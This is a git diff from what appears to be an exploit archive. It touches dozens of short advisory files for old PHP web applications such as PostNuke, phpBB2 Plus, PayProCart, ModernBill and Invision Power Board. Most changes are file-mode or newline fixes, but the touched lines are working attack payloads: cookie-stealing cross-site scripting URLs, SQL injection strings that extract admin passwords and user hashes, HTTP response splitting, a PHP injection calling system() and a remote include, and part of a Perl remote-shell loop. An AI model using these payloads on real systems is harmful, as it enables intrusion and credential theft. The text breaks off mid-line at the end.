b/platforms/php/webapps/25367.txt @@ -4,4 +4,4 @@ A remote cross-site scripting vulnerability affects PostNuke. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/admin.php?module=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480 \ No newline at end of file +http://www.example.com/admin.php?module=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480 \ No newline at end of file diff --git a/platforms/php/webapps/25368.txt b/platforms/php/webapps/25368.txt old mode 100755 new mode 100644 index cc684541c..662960ade --- a/platforms/php/webapps/25368.txt +++ b/platforms/php/webapps/25368.txt @@ -4,4 +4,4 @@ A remote SQL Injection vulnerability affects PostNuke Phoenix. This issue is due An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft sensitive information, potentially including authentication credentials, and data corruption. -http://localhost/modules.php?op=modload&name=News&file=article&sid='SQL_INJECTION&POSTNUKESID=355776cfb622466924a7096d4471a480 \ No newline at end of file +http://localhost/modules.php?op=modload&name=News&file=article&sid='SQL_INJECTION&POSTNUKESID=355776cfb622466924a7096d4471a480 \ No newline at end of file diff --git a/platforms/php/webapps/25369.txt b/platforms/php/webapps/25369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25370.txt b/platforms/php/webapps/25370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25371.txt b/platforms/php/webapps/25371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25372.txt b/platforms/php/webapps/25372.txt old mode 100755 new mode 100644 index 2ca4bd602..603f733ae --- a/platforms/php/webapps/25372.txt +++ b/platforms/php/webapps/25372.txt @@ -16,4 +16,4 @@ http://www.example.com/auciton_software/index.php?a=listings&mode=1&order=name&c http://www.example.com/auciton_software/index.php?a=listings&mode=1&order='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat= -http://www.example.com/auciton_software/index.php?a=myareas&area=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/auciton_software/index.php?a=myareas&area=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25373.txt b/platforms/php/webapps/25373.txt old mode 100755 new mode 100644 index 70502008c..3bdc7617b --- a/platforms/php/webapps/25373.txt +++ b/platforms/php/webapps/25373.txt @@ -10,4 +10,4 @@ The following specific issues were identified: AzDGDatingPlatinum 1.1.0 is reported vulnerable. Other versions may be affected as well. -http://www.example.com/[path]/view.php?l=default&id=3%3Cscript%3Ealert();%3C/script%3E \ No newline at end of file +http://www.example.com/[path]/view.php?l=default&id=3%3Cscript%3Ealert();%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25374.txt b/platforms/php/webapps/25374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25376.txt b/platforms/php/webapps/25376.txt old mode 100755 new mode 100644 index a10675729..9847fed30 --- a/platforms/php/webapps/25376.txt +++ b/platforms/php/webapps/25376.txt @@ -6,4 +6,4 @@ The problem presents itself specifically when an attacker passes the location of ModernBill 4.3 and prior versions are vulnerable to this issue. -http://www.example.com/samples/news.php?DIR=http://www.example.com/ \ No newline at end of file +http://www.example.com/samples/news.php?DIR=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25377.txt b/platforms/php/webapps/25377.txt old mode 100755 new mode 100644 index 06666f065..c9b4a742a --- a/platforms/php/webapps/25377.txt +++ b/platforms/php/webapps/25377.txt @@ -6,4 +6,4 @@ This issue is due to a failure in the application to properly sanitize user-supp ModernBill 4.3 and prior versions are vulnerable to this issue. -http://www.example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS] \ No newline at end of file +http://www.example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25378.txt b/platforms/php/webapps/25378.txt old mode 100755 new mode 100644 index d745ed1aa..b69d918df --- a/platforms/php/webapps/25378.txt +++ b/platforms/php/webapps/25378.txt @@ -6,4 +6,4 @@ This issue is due to a failure in the application to properly sanitize user-supp ModernBill 4.3 and prior versions are vulnerable to this issue. -http://www.example.com/order/orderwiz.php?v=1&aid=[XSS] \ No newline at end of file +http://www.example.com/order/orderwiz.php?v=1&aid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25379.txt b/platforms/php/webapps/25379.txt old mode 100755 new mode 100644 index 312f25e94..5eaa8028b --- a/platforms/php/webapps/25379.txt +++ b/platforms/php/webapps/25379.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue is reported to affect zOOm Media Gallery version 2.1.2; other versions may also be affected. -http://www.example.com/index.php?option=com_zoom&Itemid=39&catid=2+OR+1=1 \ No newline at end of file +http://www.example.com/index.php?option=com_zoom&Itemid=39&catid=2+OR+1=1 \ No newline at end of file diff --git a/platforms/php/webapps/25380.txt b/platforms/php/webapps/25380.txt old mode 100755 new mode 100644 index 12e779c6d..b2935a827 --- a/platforms/php/webapps/25380.txt +++ b/platforms/php/webapps/25380.txt @@ -4,4 +4,4 @@ Invision Power Board is reported prone to an SQL injection vulnerability. Due to Invision Power Board 1.3.1 and prior versions are affected by this issue. -http://www.example.com/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION \ No newline at end of file +http://www.example.com/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/25381.txt b/platforms/php/webapps/25381.txt old mode 100755 new mode 100644 index 29e4e5511..a66461ca8 --- a/platforms/php/webapps/25381.txt +++ b/platforms/php/webapps/25381.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code would be able to access properties of the This issue is reported to affect WebCT Version 4.1; other versions may also be affected. </pre><table background=java&#x09;script:alert("XSS Warning")> -</table> \ No newline at end of file +</table> \ No newline at end of file diff --git a/platforms/php/webapps/25382.txt b/platforms/php/webapps/25382.txt old mode 100755 new mode 100644 index 056b15e37..0bd88bd85 --- a/platforms/php/webapps/25382.txt +++ b/platforms/php/webapps/25382.txt @@ -15,4 +15,4 @@ NULL, NULL, NULL, NULL, NULL from admins where '1=1 and then: ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, -NULL, NULL, NULL, NULL, NULL from admins where '1=1 \ No newline at end of file +NULL, NULL, NULL, NULL, NULL from admins where '1=1 \ No newline at end of file diff --git a/platforms/php/webapps/2539.txt b/platforms/php/webapps/2539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25394.txt b/platforms/php/webapps/25394.txt old mode 100755 new mode 100644 index 07cf862e5..fe6651ba1 --- a/platforms/php/webapps/25394.txt +++ b/platforms/php/webapps/25394.txt @@ -4,4 +4,4 @@ Pinnacle Cart is affected by a cross-site scripting vulnerability because the ap An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?p=catalog&parent=12&pg="><script>alert(document.domain);</script> \ No newline at end of file +http://www.example.com/index.php?p=catalog&parent=12&pg="><script>alert(document.domain);</script> \ No newline at end of file diff --git a/platforms/php/webapps/25398.txt b/platforms/php/webapps/25398.txt old mode 100755 new mode 100644 index c826f18c3..8845efb01 --- a/platforms/php/webapps/25398.txt +++ b/platforms/php/webapps/25398.txt @@ -4,4 +4,4 @@ phpBB2 Plus is affected by a cross-site scripting vulnerability. This issue is d An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/groupcp.php?g=881&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/groupcp.php?g=881&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25399.txt b/platforms/php/webapps/25399.txt old mode 100755 new mode 100644 index fe22d9304..ee9508c06 --- a/platforms/php/webapps/25399.txt +++ b/platforms/php/webapps/25399.txt @@ -8,4 +8,4 @@ These issues affect phpBB2 Plus version 1.52 and earlier. http://www.example.com/index.php?c=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217 -http://www.example.com/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217 \ No newline at end of file +http://www.example.com/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217 \ No newline at end of file diff --git a/platforms/php/webapps/2540.txt b/platforms/php/webapps/2540.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25400.txt b/platforms/php/webapps/25400.txt old mode 100755 new mode 100644 index 57c335900..ea63b6764 --- a/platforms/php/webapps/25400.txt +++ b/platforms/php/webapps/25400.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to have arbitrary script code executed in These issues affect phpBB2 Plus version 1.52 and earlier. http://www.example.com/portal.php?article=0&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59 \ No newline at end of file +http://www.example.com/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59 \ No newline at end of file diff --git a/platforms/php/webapps/25401.txt b/platforms/php/webapps/25401.txt old mode 100755 new mode 100644 index f7ea9263e..3a21df0c3 --- a/platforms/php/webapps/25401.txt +++ b/platforms/php/webapps/25401.txt @@ -4,4 +4,4 @@ phpBB2 Plus is affected by a cross-site scripting vulnerability. This issue is d An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/viewtopic.php?p=58834&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/viewtopic.php?p=58834&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25403.txt b/platforms/php/webapps/25403.txt old mode 100755 new mode 100644 index 5e2045ea3..eb1116a3f --- a/platforms/php/webapps/25403.txt +++ b/platforms/php/webapps/25403.txt @@ -4,4 +4,4 @@ Photo Album is affected by a cross-site scripting vulnerability. This issue is d An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/album_cat.php?cat_id=5&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/album_cat.php?cat_id=5&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25404.txt b/platforms/php/webapps/25404.txt old mode 100755 new mode 100644 index 02b8d7c2e..2d0ab89ad --- a/platforms/php/webapps/25404.txt +++ b/platforms/php/webapps/25404.txt @@ -4,4 +4,4 @@ Photo Album is affected by a cross-site scripting vulnerability. This issue is d An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/album_comment.php?pic_id=224&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/album_comment.php?pic_id=224&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25405.txt b/platforms/php/webapps/25405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25409.txt b/platforms/php/webapps/25409.txt old mode 100755 new mode 100644 index bb7ca7647..ff50593f0 --- a/platforms/php/webapps/25409.txt +++ b/platforms/php/webapps/25409.txt @@ -76,6 +76,4 @@ CSRF: </body> </html> -#################################################################### - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/25410.txt b/platforms/php/webapps/25410.txt old mode 100755 new mode 100644 index c545ffa92..76f4b0b66 --- a/platforms/php/webapps/25410.txt +++ b/platforms/php/webapps/25410.txt @@ -14,6 +14,4 @@ Sql Injection: server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql] server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- - -#################################################################### - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/25422.txt b/platforms/php/webapps/25422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25423.txt b/platforms/php/webapps/25423.txt old mode 100755 new mode 100644 index a6f684731..4d33e7c84 --- a/platforms/php/webapps/25423.txt +++ b/platforms/php/webapps/25423.txt @@ -8,4 +8,4 @@ This issue is reported to affect sphpBlog version 0.4.0; earlier versions may al http://www.example.com/sphpblog/search.php?q=[XSS] http://www.example.com/sphpblog/search.php?q=%3Cmarquee%3Ewe+are+a+like%3C%2Fmarquee%3E -http://www.example.com/sphpblog/search.php?q=<a href=http://echo.or.id>echo</a> \ No newline at end of file +http://www.example.com/sphpblog/search.php?q=<a href=http://echo.or.id>echo</a> \ No newline at end of file diff --git a/platforms/php/webapps/25430.txt b/platforms/php/webapps/25430.txt old mode 100755 new mode 100644 index 1a31e53c9..3b0547abb --- a/platforms/php/webapps/25430.txt +++ b/platforms/php/webapps/25430.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability to influence or misrepresent ho This issue is reported to affect PHP-Nuke version 7.6; earlier versions may also be vulnerable. -http://www.example.com/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3EHELLO AM VULNERABLE TO HTTP RESPONSE SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5 \ No newline at end of file +http://www.example.com/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3EHELLO AM VULNERABLE TO HTTP RESPONSE SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5 \ No newline at end of file diff --git a/platforms/php/webapps/25431.pl b/platforms/php/webapps/25431.pl index e68a415b1..a2fdab082 100755 --- a/platforms/php/webapps/25431.pl +++ b/platforms/php/webapps/25431.pl @@ -97,4 +97,4 @@ HTTP/1.1\r\n"; print "<Shell> "; $cmd = <STDIN>; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/25432.txt b/platforms/php/webapps/25432.txt old mode 100755 new mode 100644 index 61f37ee8d..80139b284 --- a/platforms/php/webapps/25432.txt +++ b/platforms/php/webapps/25432.txt @@ -4,4 +4,4 @@ A remote SQL injection vulnerability affects the datenbank module for phpbb. Thi An attacker may exploit this issue to manipulate SQL queries to the underlying database. This may facilitate theft sensitive information, potentially including authentication credentials, and data corruption. -http://www.example.com/phpBB/moddb/mod.php?id='[SQL Injection] \ No newline at end of file +http://www.example.com/phpBB/moddb/mod.php?id='[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/25433.txt b/platforms/php/webapps/25433.txt old mode 100755 new mode 100644 index 944f07357..1d2d7672a --- a/platforms/php/webapps/25433.txt +++ b/platforms/php/webapps/25433.txt @@ -4,4 +4,4 @@ A remote cross-site scripting vulnerability affects the datenbank module for php An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/phpBB/moddb/mod.php?id='>&lt;script&gt;alert(document.cookie)&lt;/script&gt; \ No newline at end of file +http://www.example.com/phpBB/moddb/mod.php?id='>&lt;script&gt;alert(document.cookie)&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/25434.txt b/platforms/php/webapps/25434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25435.txt b/platforms/php/webapps/25435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25436.txt b/platforms/php/webapps/25436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25437.txt b/platforms/php/webapps/25437.txt old mode 100755 new mode 100644 index 92a61c636..24fbde39c --- a/platforms/php/webapps/25437.txt +++ b/platforms/php/webapps/25437.txt @@ -4,4 +4,4 @@ eGroupWare is prone to multiple input validation vulnerabilities. A fixed versio The issues arise due to a failure of the application to properly validate user-supplied input. These issues result in cross-site scripting and SQL injection attacks. -http://egroupware/index.php?menuaction=preferences.uicategories.index&cats_app=foobar[SQL] \ No newline at end of file +http://egroupware/index.php?menuaction=preferences.uicategories.index&cats_app=foobar[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/25438.txt b/platforms/php/webapps/25438.txt old mode 100755 new mode 100644 index c061983be..d73a0d84b --- a/platforms/php/webapps/25438.txt +++ b/platforms/php/webapps/25438.txt @@ -4,4 +4,4 @@ mvnForum is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/mvnforum/Search="><script>alert('XSS found here')</script> \ No newline at end of file +http://www.example.com/mvnforum/Search="><script>alert('XSS found here')</script> \ No newline at end of file diff --git a/platforms/php/webapps/25440.txt b/platforms/php/webapps/25440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25441.txt b/platforms/php/webapps/25441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25442.txt b/platforms/php/webapps/25442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25447.txt b/platforms/php/webapps/25447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25449.txt b/platforms/php/webapps/25449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25451.txt b/platforms/php/webapps/25451.txt old mode 100755 new mode 100644 index 15c4be78b..1ca0b5bbf --- a/platforms/php/webapps/25451.txt +++ b/platforms/php/webapps/25451.txt @@ -4,4 +4,4 @@ Knowledge Base Module is affected by an SQL injection vulnerability. This issue Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0 \ No newline at end of file +http://www.example.com/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0 \ No newline at end of file diff --git a/platforms/php/webapps/25457.c b/platforms/php/webapps/25457.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25458.txt b/platforms/php/webapps/25458.txt old mode 100755 new mode 100644 index 11cdb9351..a4a549e13 --- a/platforms/php/webapps/25458.txt +++ b/platforms/php/webapps/25458.txt @@ -4,4 +4,4 @@ CityPost PHP LNKX is affected by a cross-site scripting vulnerability. This issu An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/lnkx/message.php?msg=[XSS] \ No newline at end of file +http://www.example.com/lnkx/message.php?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25459.txt b/platforms/php/webapps/25459.txt old mode 100755 new mode 100644 index 53bb2d936..83bc5a286 --- a/platforms/php/webapps/25459.txt +++ b/platforms/php/webapps/25459.txt @@ -8,4 +8,4 @@ CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerabili An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS] \ No newline at end of file +http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25464.txt b/platforms/php/webapps/25464.txt old mode 100755 new mode 100644 index fd1eaa6ee..1063b7e4e --- a/platforms/php/webapps/25464.txt +++ b/platforms/php/webapps/25464.txt @@ -4,4 +4,4 @@ CityPost Simple PHP Upload is affected by a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/simple-upload-53.php?message=[XSS] \ No newline at end of file +http://www.example.com/simple-upload-53.php?message=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25467.txt b/platforms/php/webapps/25467.txt old mode 100755 new mode 100644 index 8fa4e7b1b..146ec1d74 --- a/platforms/php/webapps/25467.txt +++ b/platforms/php/webapps/25467.txt @@ -4,4 +4,4 @@ A remote PHP script injection vulnerability affects Netref. This issue is due to An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer. -http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?> \ No newline at end of file +http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?> \ No newline at end of file diff --git a/platforms/php/webapps/25468.txt b/platforms/php/webapps/25468.txt old mode 100755 new mode 100644 index a5fd8b4c0..b62c9581e --- a/platforms/php/webapps/25468.txt +++ b/platforms/php/webapps/25468.txt @@ -4,4 +4,4 @@ PHP Labs proFile is prone to a cross-site scripting vulnerability. As a result, Exploitation could allow theft of cookie-based authentication credentials or other attacks. -http://www.example.com/index.php?act=load&dir=[XSS] \ No newline at end of file +http://www.example.com/index.php?act=load&dir=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25469.txt b/platforms/php/webapps/25469.txt old mode 100755 new mode 100644 index 21f7009dc..fbbfeae37 --- a/platforms/php/webapps/25469.txt +++ b/platforms/php/webapps/25469.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/products/calendar/demo/admin/?Admin_ID=Admin' UNION ALL SELECT id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,i d,id FROM settings WHERE -Admin_id='Admin&Password=1 \ No newline at end of file +Admin_id='Admin&Password=1 \ No newline at end of file diff --git a/platforms/php/webapps/25473.txt b/platforms/php/webapps/25473.txt old mode 100755 new mode 100644 index 4996a6083..2a9b894a8 --- a/platforms/php/webapps/25473.txt +++ b/platforms/php/webapps/25473.txt @@ -6,4 +6,4 @@ Exploitation could allow theft of cookie-based authentication credentials or oth http://www.example.com/index.php?act=delete&dir=&file=[XSS] http://www.example.com/index.php?act=copy&dir=&file=[XSS] -http://www.example.com/index.php?act=rename&dir=&file=[XSS] \ No newline at end of file +http://www.example.com/index.php?act=rename&dir=&file=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25474.txt b/platforms/php/webapps/25474.txt old mode 100755 new mode 100644 index e48d1350a..cf95baf35 --- a/platforms/php/webapps/25474.txt +++ b/platforms/php/webapps/25474.txt @@ -4,4 +4,4 @@ phpbb-auction module is prone to an SQL injection vulnerability. This issue is d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/auction_rating.php?mode=view&u=' \ No newline at end of file +http://www.example.com/auction_rating.php?mode=view&u=' \ No newline at end of file diff --git a/platforms/php/webapps/25475.txt b/platforms/php/webapps/25475.txt old mode 100755 new mode 100644 index 71fd17f1b..dc95966d4 --- a/platforms/php/webapps/25475.txt +++ b/platforms/php/webapps/25475.txt @@ -4,4 +4,4 @@ phpbb-auction module is prone to an SQL injection vulnerability. This issue is d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/auction_offer.php?mode=add&ar=' \ No newline at end of file +http://www.example.com/auction_offer.php?mode=add&ar=' \ No newline at end of file diff --git a/platforms/php/webapps/25488.txt b/platforms/php/webapps/25488.txt old mode 100755 new mode 100644 index 95d50db91..cd99a9542 --- a/platforms/php/webapps/25488.txt +++ b/platforms/php/webapps/25488.txt @@ -4,4 +4,4 @@ PayProCart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/path_to_store/index.php?modID=usrauthlogin&sgnuptype=csaleID&username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&errorMsgNum=301 \ No newline at end of file +http://www.example.com/path_to_store/index.php?modID=usrauthlogin&sgnuptype=csaleID&username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&errorMsgNum=301 \ No newline at end of file diff --git a/platforms/php/webapps/25489.txt b/platforms/php/webapps/25489.txt old mode 100755 new mode 100644 index c826c54b3..88670d37b --- a/platforms/php/webapps/25489.txt +++ b/platforms/php/webapps/25489.txt @@ -4,4 +4,4 @@ PayProCart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/path_to_store/cart.php?chckoutaction=1&ckprvd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/path_to_store/cart.php?chckoutaction=1&ckprvd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25490.txt b/platforms/php/webapps/25490.txt old mode 100755 new mode 100644 index 791924811..a5acaff69 --- a/platforms/php/webapps/25490.txt +++ b/platforms/php/webapps/25490.txt @@ -4,4 +4,4 @@ PayProCart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/path_to_store/adminshop/index.php?hdoc=index%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/path_to_store/adminshop/index.php?hdoc=index%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25491.txt b/platforms/php/webapps/25491.txt old mode 100755 new mode 100644 index fe6918a11..d45eb1798 --- a/platforms/php/webapps/25491.txt +++ b/platforms/php/webapps/25491.txt @@ -4,4 +4,4 @@ PayProCart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/path_to_store/adminshop/index.php?modID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/path_to_store/adminshop/index.php?modID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25492.txt b/platforms/php/webapps/25492.txt old mode 100755 new mode 100644 index 7ec4ebd2e..2b887be89 --- a/platforms/php/webapps/25492.txt +++ b/platforms/php/webapps/25492.txt @@ -4,4 +4,4 @@ PayProCart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/path_to-store/adminshop/index.php?taskID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/path_to-store/adminshop/index.php?taskID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25493.txt b/platforms/php/webapps/25493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25494.txt b/platforms/php/webapps/25494.txt old mode 100755 new mode 100644 index 19593cdba..5dca657e5 --- a/platforms/php/webapps/25494.txt +++ b/platforms/php/webapps/25494.txt @@ -4,4 +4,4 @@ PayProCart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/path_to_store/adminshop/index.php?proMod=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/path_to_store/adminshop/index.php?proMod=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25495.txt b/platforms/php/webapps/25495.txt old mode 100755 new mode 100644 index 0b6ffcc65..1a816f97d --- a/platforms/php/webapps/25495.txt +++ b/platforms/php/webapps/25495.txt @@ -4,4 +4,4 @@ PayProCart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/path_to_store/adminshop/mmailer/index.php?mmactionComm=mmShowMailingLists%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/path_to_store/adminshop/mmailer/index.php?mmactionComm=mmShowMailingLists%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git 